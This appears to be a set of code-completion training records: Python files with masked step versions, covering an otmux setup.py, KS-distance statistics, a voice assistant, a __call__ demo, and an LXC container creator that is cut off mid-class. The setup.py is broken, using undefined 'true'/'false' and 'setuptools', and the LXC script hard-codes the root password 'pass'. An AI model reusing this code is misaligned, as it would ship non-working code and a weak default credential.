"step-2": "try:\n from setuptools import setup\n from setuptools import find_packages\n has_setup_tools = true\nexcept ImportError:\n from distutils.core import setup\n has_setup_tools = false\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\nif has_setup_tools is True:\n packages = setuptools.find_packages()\nelse:\n packages = ['otmux']\nsetup(name='otmux', version='__version', description=\n 'multiple remote activities using ssh and tmux', long_description=\n long_description, url='https://github.com/rda3mon/otmux', author=\n 'Mallikarjun', author_email='[email protected]', license=\n 'Apache License 2.0', packages=['otmux'], classifiers=[\n 'Topic :: tmux :: ssh',\n 'Development Status :: 2 - Experimental/Unstable',\n 'Environment :: Console', 'License :: Apache License 2.0',\n 'Programming Language :: Python :: 2.7',\n 'Operating System :: OS Independent'])\n",
"step-3": "try:\n from setuptools import setup\n from setuptools import find_packages\n has_setup_tools = true\nexcept ImportError:\n from distutils.core import setup\n has_setup_tools = false\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nif has_setup_tools is True:\n packages = setuptools.find_packages()\nelse:\n packages = [\"otmux\"]\n\nsetup(\n name=\"otmux\",\n version=\"__version\",\n description=\"multiple remote activities using ssh and tmux\",\n long_description=long_description,\n url=\"https://github.com/rda3mon/otmux\",\n author=\"Mallikarjun\",\n author_email=\"[email protected]\",\n license=\"Apache License 2.0\",\n packages=[\"otmux\"],\n classifiers=[\n 'Topic :: tmux :: ssh',\n 'Development Status :: 2 - Experimental/Unstable',\n 'Environment :: Console',\n 'License :: Apache License 2.0',\n 'Programming Language :: Python :: 2.7',\n \"Operating System :: OS Independent\"\n ]\n)\n\n\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def weib(x, nn, a):
return a / nn * (x / nn) ** (a - 1) * n.exp(-(x / nn) ** a)
<|reserved_special_token_0|>
print('distancias de KS para os modelos matematicos:', diffN, diffN2, diffU,
diffU2, diffW, diffP)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
a = st.norm(0, 1)
b = st.norm(0.1, 1)
domain = n.linspace(-4, 4, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffN = n.abs(avals - bvals).max()
a = st.norm(0, 1)
b = st.norm(0, 1.2)
domain = n.linspace(-4, 4, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffN2 = n.abs(avals - bvals).max()
a = st.uniform(0, 1)
b = st.uniform(0.05, 1.0)
domain = n.linspace(0, 1.05, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffU = n.abs(avals - bvals).max()
a = st.uniform(0, 1)
b = st.uniform(-0.05, 1.05)
domain = n.linspace(0, 1.05, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffU2 = n.abs(avals - bvals).max()
x = n.linspace(0, 20, 100000)
step = x[1] - x[0]
def weib(x, nn, a):
return a / nn * (x / nn) ** (a - 1) * n.exp(-(x / nn) ** a)
W = weib(x, 1.0, 1.5)
W_ = W / (W * step).sum()
W__ = n.cumsum(W_)
W2 = weib(x, 1.0, 1.7)
W2_ = W2 / (W2 * step).sum()
W2__ = n.cumsum(W2_)
diffW = n.abs(W_ - W2_).max()
a = st.powerlaw(1.5)
b = st.powerlaw(1.7)
domain = n.linspace(0, 5.05, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffP = n.abs(avals - bvals).max()
print('distancias de KS para os modelos matematicos:', diffN, diffN2, diffU,
diffU2, diffW, diffP)
lb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7
x = n.linspace(lb, rb, NE)
step = x[1] - x[0]
W = weib(x, 1.0, shape1)
W_ = W / (W * step).sum()
W__ = n.cumsum(W_)
W2 = weib(x, 1.0, shape2)
W2_ = W2 / (W2 * step).sum()
W2__ = n.cumsum(W2_)
diffW = n.abs(W__ - W2__).max()
lb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7
x = n.linspace(lb, rb, NE)
step = x[1] - x[0]
W = weib(x, 1.0, shape1)
W_ = W / W.sum()
W__ = n.cumsum(W_)
W2 = weib(x, 1.0, shape2)
W2_ = W2 / W2.sum()
W2__ = n.cumsum(W2_)
diffW = n.abs(W__ - W2__).max()
<|reserved_special_token_1|>
import numpy as n, pylab as p
from scipy import stats as st
a = st.norm(0, 1)
b = st.norm(0.1, 1)
domain = n.linspace(-4, 4, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffN = n.abs(avals - bvals).max()
a = st.norm(0, 1)
b = st.norm(0, 1.2)
domain = n.linspace(-4, 4, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffN2 = n.abs(avals - bvals).max()
a = st.uniform(0, 1)
b = st.uniform(0.05, 1.0)
domain = n.linspace(0, 1.05, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffU = n.abs(avals - bvals).max()
a = st.uniform(0, 1)
b = st.uniform(-0.05, 1.05)
domain = n.linspace(0, 1.05, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffU2 = n.abs(avals - bvals).max()
x = n.linspace(0, 20, 100000)
step = x[1] - x[0]
def weib(x, nn, a):
return a / nn * (x / nn) ** (a - 1) * n.exp(-(x / nn) ** a)
W = weib(x, 1.0, 1.5)
W_ = W / (W * step).sum()
W__ = n.cumsum(W_)
W2 = weib(x, 1.0, 1.7)
W2_ = W2 / (W2 * step).sum()
W2__ = n.cumsum(W2_)
diffW = n.abs(W_ - W2_).max()
a = st.powerlaw(1.5)
b = st.powerlaw(1.7)
domain = n.linspace(0, 5.05, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffP = n.abs(avals - bvals).max()
print('distancias de KS para os modelos matematicos:', diffN, diffN2, diffU,
diffU2, diffW, diffP)
lb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7
x = n.linspace(lb, rb, NE)
step = x[1] - x[0]
W = weib(x, 1.0, shape1)
W_ = W / (W * step).sum()
W__ = n.cumsum(W_)
W2 = weib(x, 1.0, shape2)
W2_ = W2 / (W2 * step).sum()
W2__ = n.cumsum(W2_)
diffW = n.abs(W__ - W2__).max()
lb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7
x = n.linspace(lb, rb, NE)
step = x[1] - x[0]
W = weib(x, 1.0, shape1)
W_ = W / W.sum()
W__ = n.cumsum(W_)
W2 = weib(x, 1.0, shape2)
W2_ = W2 / W2.sum()
W2__ = n.cumsum(W2_)
diffW = n.abs(W__ - W2__).max()
<|reserved_special_token_1|>
import numpy as n, pylab as p
from scipy import stats as st
a=st.norm(0,1)
b=st.norm(0.1,1)
domain=n.linspace(-4,4,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffN=n.abs(avals-bvals).max()
a=st.norm(0,1)
b=st.norm(0,1.2)
domain=n.linspace(-4,4,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffN2=n.abs(avals-bvals).max()
a=st.uniform(0,1)
b=st.uniform(0.05,1.0)
domain=n.linspace(0,1.05,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffU=n.abs(avals-bvals).max()
a=st.uniform(0,1)
b=st.uniform(-0.05,1.05)
domain=n.linspace(0,1.05,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffU2=n.abs(avals-bvals).max()
#a=st.weibull(1.5)
#b=st.weibull(1.7)
#domain=n.linspace(0,1.05,10000)
#avals=a.cdf(domain)
#bvals=b.cdf(domain)
#diffW=n.abs(avals-bvals).max()
#a=st.power(1.5)
#b=st.power(1.7)
#domain=n.linspace(0,1.05,10000)
#avals=a.cdf(domain)
#bvals=b.cdf(domain)
#diffP=n.abs(avals-bvals).max()
#x = n.arange(1,100.)/50.
x=n.linspace(0,20,100000)
step=x[1]-x[0]
def weib(x,nn,a):
return (a / nn) * (x / nn)**(a - 1) * n.exp(-(x / nn)**a)
#count, bins, ignored = p.hist(n.random.weibull(5.,1000))
#x = n.arange(1,100.)/50.
#scale = count.max()/weib(x, 1., 5.).max()
W=weib(x, 1., 1.5)
W_=W/(W*step).sum()
W__=n.cumsum(W_)
W2=weib(x, 1., 1.7)
W2_=W2/(W2*step).sum()
W2__=n.cumsum(W2_)
diffW=n.abs(W_-W2_).max()
#p.plot(x, W_)
#p.plot(x, W2_)
##p.plot(x, weib(x, 1., 5.)*scale)
#p.show()
a=st.powerlaw(1.5)
b=st.powerlaw(1.7)
domain=n.linspace(0,5.05,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffP=n.abs(avals-bvals).max()
print("distancias de KS para os modelos matematicos:", diffN,diffN2,diffU,diffU2,diffW,diffP)
# KS distances for the mathematical models:
# 0.0398776116762 0.0439947104098 0.0952338090952 0.047619047619 0.128565475845 0.0460149130584
# X = (-n.ln(U))^{1/a}
lb,rb,NE,shape1,shape2=0,10,10000,1.5,1.7
x=n.linspace(lb,rb,NE)
step=x[1]-x[0]
W=weib(x, 1., shape1)
W_=W/((W*step).sum())
W__=n.cumsum(W_)
W2=weib(x, 1., shape2)
W2_=W2/((W2*step).sum())
W2__=n.cumsum(W2_)
diffW=n.abs(W__-W2__).max()
lb,rb,NE,shape1,shape2=0,10,10000,1.5,1.7
x=n.linspace(lb,rb,NE)
step=x[1]-x[0]
W=weib(x, 1., shape1)
W_=W/((W).sum())
W__=n.cumsum(W_)
W2=weib(x, 1., shape2)
W2_=W2/((W2).sum())
W2__=n.cumsum(W2_)
diffW=n.abs(W__-W2__).max()
|
flexible
|
{
"blob_id": "647258ee5f2f6f1cb8118bcf146b8959c65b70cd",
"index": 8045,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef weib(x, nn, a):\n return a / nn * (x / nn) ** (a - 1) * n.exp(-(x / nn) ** a)\n\n\n<mask token>\nprint('distancias de KS para os modelos matematicos:', diffN, diffN2, diffU,\n diffU2, diffW, diffP)\n<mask token>\n",
"step-3": "<mask token>\na = st.norm(0, 1)\nb = st.norm(0.1, 1)\ndomain = n.linspace(-4, 4, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffN = n.abs(avals - bvals).max()\na = st.norm(0, 1)\nb = st.norm(0, 1.2)\ndomain = n.linspace(-4, 4, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffN2 = n.abs(avals - bvals).max()\na = st.uniform(0, 1)\nb = st.uniform(0.05, 1.0)\ndomain = n.linspace(0, 1.05, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffU = n.abs(avals - bvals).max()\na = st.uniform(0, 1)\nb = st.uniform(-0.05, 1.05)\ndomain = n.linspace(0, 1.05, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffU2 = n.abs(avals - bvals).max()\nx = n.linspace(0, 20, 100000)\nstep = x[1] - x[0]\n\n\ndef weib(x, nn, a):\n return a / nn * (x / nn) ** (a - 1) * n.exp(-(x / nn) ** a)\n\n\nW = weib(x, 1.0, 1.5)\nW_ = W / (W * step).sum()\nW__ = n.cumsum(W_)\nW2 = weib(x, 1.0, 1.7)\nW2_ = W2 / (W2 * step).sum()\nW2__ = n.cumsum(W2_)\ndiffW = n.abs(W_ - W2_).max()\na = st.powerlaw(1.5)\nb = st.powerlaw(1.7)\ndomain = n.linspace(0, 5.05, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffP = n.abs(avals - bvals).max()\nprint('distancias de KS para os modelos matematicos:', diffN, diffN2, diffU,\n diffU2, diffW, diffP)\nlb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7\nx = n.linspace(lb, rb, NE)\nstep = x[1] - x[0]\nW = weib(x, 1.0, shape1)\nW_ = W / (W * step).sum()\nW__ = n.cumsum(W_)\nW2 = weib(x, 1.0, shape2)\nW2_ = W2 / (W2 * step).sum()\nW2__ = n.cumsum(W2_)\ndiffW = n.abs(W__ - W2__).max()\nlb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7\nx = n.linspace(lb, rb, NE)\nstep = x[1] - x[0]\nW = weib(x, 1.0, shape1)\nW_ = W / W.sum()\nW__ = n.cumsum(W_)\nW2 = weib(x, 1.0, shape2)\nW2_ = W2 / W2.sum()\nW2__ = n.cumsum(W2_)\ndiffW = n.abs(W__ - W2__).max()\n",
"step-4": "import numpy as n, pylab as p\nfrom scipy import stats as st\na = st.norm(0, 1)\nb = st.norm(0.1, 1)\ndomain = n.linspace(-4, 4, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffN = n.abs(avals - bvals).max()\na = st.norm(0, 1)\nb = st.norm(0, 1.2)\ndomain = n.linspace(-4, 4, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffN2 = n.abs(avals - bvals).max()\na = st.uniform(0, 1)\nb = st.uniform(0.05, 1.0)\ndomain = n.linspace(0, 1.05, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffU = n.abs(avals - bvals).max()\na = st.uniform(0, 1)\nb = st.uniform(-0.05, 1.05)\ndomain = n.linspace(0, 1.05, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffU2 = n.abs(avals - bvals).max()\nx = n.linspace(0, 20, 100000)\nstep = x[1] - x[0]\n\n\ndef weib(x, nn, a):\n return a / nn * (x / nn) ** (a - 1) * n.exp(-(x / nn) ** a)\n\n\nW = weib(x, 1.0, 1.5)\nW_ = W / (W * step).sum()\nW__ = n.cumsum(W_)\nW2 = weib(x, 1.0, 1.7)\nW2_ = W2 / (W2 * step).sum()\nW2__ = n.cumsum(W2_)\ndiffW = n.abs(W_ - W2_).max()\na = st.powerlaw(1.5)\nb = st.powerlaw(1.7)\ndomain = n.linspace(0, 5.05, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffP = n.abs(avals - bvals).max()\nprint('distancias de KS para os modelos matematicos:', diffN, diffN2, diffU,\n diffU2, diffW, diffP)\nlb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7\nx = n.linspace(lb, rb, NE)\nstep = x[1] - x[0]\nW = weib(x, 1.0, shape1)\nW_ = W / (W * step).sum()\nW__ = n.cumsum(W_)\nW2 = weib(x, 1.0, shape2)\nW2_ = W2 / (W2 * step).sum()\nW2__ = n.cumsum(W2_)\ndiffW = n.abs(W__ - W2__).max()\nlb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7\nx = n.linspace(lb, rb, NE)\nstep = x[1] - x[0]\nW = weib(x, 1.0, shape1)\nW_ = W / W.sum()\nW__ = n.cumsum(W_)\nW2 = weib(x, 1.0, shape2)\nW2_ = W2 / W2.sum()\nW2__ = n.cumsum(W2_)\ndiffW = n.abs(W__ - W2__).max()\n",
"step-5": "import numpy as n, pylab as p\nfrom scipy import stats as st\na=st.norm(0,1)\nb=st.norm(0.1,1)\ndomain=n.linspace(-4,4,10000)\navals=a.cdf(domain)\nbvals=b.cdf(domain)\ndiffN=n.abs(avals-bvals).max()\n\na=st.norm(0,1)\nb=st.norm(0,1.2)\ndomain=n.linspace(-4,4,10000)\navals=a.cdf(domain)\nbvals=b.cdf(domain)\ndiffN2=n.abs(avals-bvals).max()\n\na=st.uniform(0,1)\nb=st.uniform(0.05,1.0)\ndomain=n.linspace(0,1.05,10000)\navals=a.cdf(domain)\nbvals=b.cdf(domain)\ndiffU=n.abs(avals-bvals).max()\n\na=st.uniform(0,1)\nb=st.uniform(-0.05,1.05)\ndomain=n.linspace(0,1.05,10000)\navals=a.cdf(domain)\nbvals=b.cdf(domain)\ndiffU2=n.abs(avals-bvals).max()\n\n#a=st.weibull(1.5)\n#b=st.weibull(1.7)\n#domain=n.linspace(0,1.05,10000)\n#avals=a.cdf(domain)\n#bvals=b.cdf(domain)\n#diffW=n.abs(avals-bvals).max()\n\n#a=st.power(1.5)\n#b=st.power(1.7)\n#domain=n.linspace(0,1.05,10000)\n#avals=a.cdf(domain)\n#bvals=b.cdf(domain)\n#diffP=n.abs(avals-bvals).max()\n\n#x = n.arange(1,100.)/50.\nx=n.linspace(0,20,100000)\nstep=x[1]-x[0]\ndef weib(x,nn,a):\n return (a / nn) * (x / nn)**(a - 1) * n.exp(-(x / nn)**a)\n\n#count, bins, ignored = p.hist(n.random.weibull(5.,1000))\n#x = n.arange(1,100.)/50.\n#scale = count.max()/weib(x, 1., 5.).max()\nW=weib(x, 1., 1.5)\nW_=W/(W*step).sum()\nW__=n.cumsum(W_)\nW2=weib(x, 1., 1.7)\nW2_=W2/(W2*step).sum()\nW2__=n.cumsum(W2_)\ndiffW=n.abs(W_-W2_).max()\n#p.plot(x, W_)\n#p.plot(x, W2_)\n##p.plot(x, weib(x, 1., 5.)*scale)\n#p.show()\n\na=st.powerlaw(1.5)\nb=st.powerlaw(1.7)\ndomain=n.linspace(0,5.05,10000)\navals=a.cdf(domain)\nbvals=b.cdf(domain)\ndiffP=n.abs(avals-bvals).max()\n\nprint(\"distancias de KS para os modelos matematicos:\", diffN,diffN2,diffU,diffU2,diffW,diffP)\n# distancias de KS para os modelos matematicos:\n# 0.0398776116762 0.0439947104098 0.0952338090952 0.047619047619 0.128565475845 0.0460149130584\n\n\n# X = (-n.ln(U))^{1/a}\nlb,rb,NE,shape1,shape2=0,10,10000,1.5,1.7\nx=n.linspace(lb,rb,NE)\nstep=x[1]-x[0]\nW=weib(x, 1., shape1)\nW_=W/((W*step).sum())\nW__=n.cumsum(W_)\nW2=weib(x, 1., shape2)\nW2_=W2/((W2*step).sum())\nW2__=n.cumsum(W2_)\ndiffW=n.abs(W__-W2__).max()\n\n\nlb,rb,NE,shape1,shape2=0,10,10000,1.5,1.7\nx=n.linspace(lb,rb,NE)\nstep=x[1]-x[0]\nW=weib(x, 1., shape1)\nW_=W/((W).sum())\nW__=n.cumsum(W_)\nW2=weib(x, 1., shape2)\nW2_=W2/((W2).sum())\nW2__=n.cumsum(W2_)\ndiffW=n.abs(W__-W2__).max()\n\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
import speech_recognition as sr
import pyttsx3
import pywhatkit
import datetime
listner = sr.Recognizer()
engine = pyttsx3.init()
#change voices
voices = engine.getProperty('voices')
engine.setProperty('voice',voices[10].id)
rate = engine.getProperty('rate')
engine.setProperty('rate', 150)
#for machine to say
def talk(text):
engine.say(text)
engine.runAndWait()
def takeCommand():
try:
with sr.Microphone() as sc:
print("Listening......")
vc = listner.listen(sc)
cmd = listner.recognize_google(vc)
cmd = cmd.lower()
if 'alexa' in cmd:
cmd = cmd.replace('alexa','')
except:
pass
return cmd
def run_alexa():
command = takeCommand()
print(command)
if 'play' in command:
song = command.replace('play','')
talk('playing '+song)
pywhatkit.playonyt(song)
if 'time' in command:
time = datetime.datetime.now().strftime('%I:%M %p')
talk('time is '+time)
print(time)
run_alexa()
|
normal
|
{
"blob_id": "c4f437e6f5aaeccb6dd0948c3ed1f1d465bb29ce",
"index": 1200,
"step-1": "<mask token>\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\n<mask token>\n",
"step-2": "<mask token>\nengine.setProperty('voice', voices[10].id)\n<mask token>\nengine.setProperty('rate', 150)\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\nrun_alexa()\n",
"step-3": "<mask token>\nlistner = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[10].id)\nrate = engine.getProperty('rate')\nengine.setProperty('rate', 150)\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\nrun_alexa()\n",
"step-4": "import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\nlistner = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[10].id)\nrate = engine.getProperty('rate')\nengine.setProperty('rate', 150)\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\nrun_alexa()\n",
"step-5": "import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\n\n\nlistner = sr.Recognizer()\nengine = pyttsx3.init()\n\n#change voices\nvoices = engine.getProperty('voices')\nengine.setProperty('voice',voices[10].id)\nrate = engine.getProperty('rate')\nengine.setProperty('rate', 150)\n\n#for machine to say\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print(\"Listening......\")\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa','')\n except:\n pass\n return cmd\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play','')\n talk('playing '+song)\n pywhatkit.playonyt(song)\n \n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is '+time)\n print(time)\n\nrun_alexa()",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
"""
@Description:
@Author : HCQ
@Contact_1: [email protected]
@Project : pytorch
@File : call_test
@Time   : 2022/5/24 10:19 PM
@Last Modify Time @Version @Desciption
-------------------- -------- -----------
2022/5/24 10:19 PM        1.0         None
"""
class Person():
def __call__(self, name):
print("__call__" + " Hello " + name)
def hello(self, name):
print("hello " + name)
person = Person()
person("hcq") # 直接调用call
person.hello("hcq")
|
normal
|
{
"blob_id": "7b1c7228c1fc9501ab857cba62a7e073691e75c9",
"index": 755,
"step-1": "<mask token>\n\n\nclass Person:\n\n def __call__(self, name):\n print('__call__' + ' Hello ' + name)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Person:\n\n def __call__(self, name):\n print('__call__' + ' Hello ' + name)\n\n def hello(self, name):\n print('hello ' + name)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Person:\n\n def __call__(self, name):\n print('__call__' + ' Hello ' + name)\n\n def hello(self, name):\n print('hello ' + name)\n\n\n<mask token>\nperson('hcq')\nperson.hello('hcq')\n",
"step-4": "<mask token>\n\n\nclass Person:\n\n def __call__(self, name):\n print('__call__' + ' Hello ' + name)\n\n def hello(self, name):\n print('hello ' + name)\n\n\nperson = Person()\nperson('hcq')\nperson.hello('hcq')\n",
"step-5": "\"\"\"\n@Description: \n@Author : HCQ\n@Contact_1: [email protected]\n@Project : pytorch\n@File : call_test\n@Time : 2022/5/24 下午10:19\n@Last Modify Time @Version @Desciption\n-------------------- -------- -----------\n2022/5/24 下午10:19 1.0 None\n\"\"\"\n\nclass Person():\n def __call__(self, name):\n print(\"__call__\" + \" Hello \" + name)\n\n def hello(self, name):\n print(\"hello \" + name)\n\nperson = Person()\nperson(\"hcq\") # 直接调用call\nperson.hello(\"hcq\")",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from vmgCommanderBase import CommanderBase
from vmgInstallerApt import InstallerApt
from vmgInstallerYum import InstallerYum
from vmgConfigLinux import ConfigLinux
from runCommands import *
import shutil
import os
import time
from vmgLogging import *
from writeFormat import *
from vmgControlVmware import *
from vmgUtils import *
""" Functions to write lines in a .vmx file. """
log = logging.getLogger("vmgen.vmgCommanderLxc")
""" The distribution used for container creation parameters. """
distro = {
"debian":{
"vm":"/home/vmgen/vmware/Debian (lxc)/Debian (lxc).vmx",
"hostname":"root@debian-lxc",
"script":"my-lxc-debian.sh",
"scripts-folder":"../scripts-lxc/debian/"},
"fedora":{
"vm":"/home/vmgen/vmware/Fedora 64-bit/Fedora 64-bit.vmx",
"hostname":"root@fedora-lxc",
"script":"my-lxc-fedora.sh",
"scripts-folder":"../scripts-lxc/fedora/"}
}
installer = {
'debian' : InstallerApt,
'ubuntu' : InstallerApt,
'fedora' : InstallerYum
}
""" Container operating system parameters. """
os_params = {
"fedora-64":{
"os":"fedora",
"version":"14",
"arch":"amd64"},
"fedora":{
"os":"fedora",
"version":"14",
"arch":"x86"},
"debian5-64":{
"os":"debian",
"version":"lenny",
"arch":"amd64"},
"debian5":{
"os":"debian",
"version":"lenny",
"arch":"x86"},
}
""" The path in the VMware machine where the container is created. """
path = "/lxc"
class CommanderLxc(CommanderBase):
def setupHardware(self):
log.info("Creating the hardware configuration...")
self.os = self.data.getSection("hardware").get("os")
self.id = self.data.getSection("hardware").get("vm_id")
# extract the os parameters from the config file
os_type = os_params[self.os]["os"]
ver = os_params[self.os]["version"]
arch = os_params[self.os]["arch"]
self.vm = distro[os_type]["vm"]
self.host = distro[os_type]["hostname"]
folder = distro[os_type]["scripts-folder"]
script = distro[os_type]["script"]
self.config = path + "/" + self.id + "/" + "config." + self.id
self.roots = path + "/" + self.id + "/" + "rootfs." + self.id
self.fstab = path + "/" + self.id + "/" + "fstab." + self.id
# set the user and host used for the SSH connection
setUserHost(self.host)
# power on the auxiliary VMware machine
log.info("\tStarting the virtual machine...")
try_power_on_vm(self.vm)
# set default root password
passwd = "pass"
#self.data.getSection("config").get("root_passwd")
# copy the needed scripts to the virtual machine
log.info("\tCopying the scripts to the virtual machine...")
files = os.listdir(folder)
paths = [os.path.join(folder, f) for f in files]
copyFilesToVM(paths, self.host)
for f in files:
executeCommandSSH("chmod a+x " + f)
# create a temp file containing lines to be appended to the container
# config file
log.info("\tFilling up the network section in the config file...")
temp_file = "eth.tmp"
with open(temp_file, "w") as f:
log.info("\Setting memory and CPUs...")
section = self.data.getSection("hardware")
ram = section.get("ram") + "M"
num_cpu = int(section.get("num_cpu"))
if num_cpu == 1:
cpus = "0"
else:
cpus = "0" + "-" + str(num_cpu - 1)
# TODO: the kernel needs support for the memory controller
writeOption(f, "#lxc.cgroup.memory.limit_in_bytes", ram, False)
writeOption(f, "lxc.cgroup.cpuset.cpus", cpus, False)
# create network interfaces
log.info("\tCreating the network interfaces...")
self.eth_list = getSortedValues(section.get("eths").data)
eth_config = getSortedValues(
self.data.getSection("network").get("eths").data)
for i, eth_pair in enumerate(zip(self.eth_list, eth_config)):
i = str(i)
eth, eth_c = eth_pair
eth_name = eth.get("name")
writeOption(f, "lxc.network.type", "veth", False)
writeOption(f, "lxc.network.link", "br0", False)
writeOption(f, "lxc.network.name", eth_name, False)
writeOption(f, "lxc.network.mtu", "1500", False)
# set IP address
ip_type = eth_c.get("type")
if ip_type == "static":
ip = eth_c.get("address")
mask = getNetmaskCIDR(eth_c.get("network"))
else:
ip = "0.0.0.0"
mask = ""
writeOption(f, "lxc.network.ipv4", ip+mask, False)
if eth.contains("connected"):
writeOption(f, "lxc.network.flags", "up", False)
# set MAC address, if present
mac = eth.get("hw_address")
if mac:
writeOption(f, "lxc.network.hwaddr", mac)
# copy the temp file to the virtual machine
copyFileToVM(temp_file, self.host)
os.remove(temp_file)
# run the script on the virtual machine, to create the container
log.info("\tRun the container creation script...")
executeCommandSSH("./" + script + " " + path + " " + self.id + " " +
ver + " " + arch + " " + passwd)
def setupOperatingSystem(self):
pass
def startVM(self):
""" Start the container. """
log.info("\tStarting the container...")
executeCommandSSH("pushd " + path)
executeCommandSSH("lxc-create" + " -n " + self.id + " -f " + self.config)
# executeCommandSSH("lxc-start" + " -n " + self.id + " -f " + self.config)
def shutdownVM(self):
""" Shutdown the container and the virtual machine. """
log.info("\tStopping the container...")
# executeCommandSSH("lxc-stop" + " -n " + self.id)
executeCommandSSH("lxc-destroy" + " -n " + self.id)
executeCommandSSH("shutdown -h now")
def connectToVM(self):
print "\nEstablishing connection to the VM..."
def disconnectFromVM(self):
print "\nTerminating connection to the VM..."
def setupServices(self):
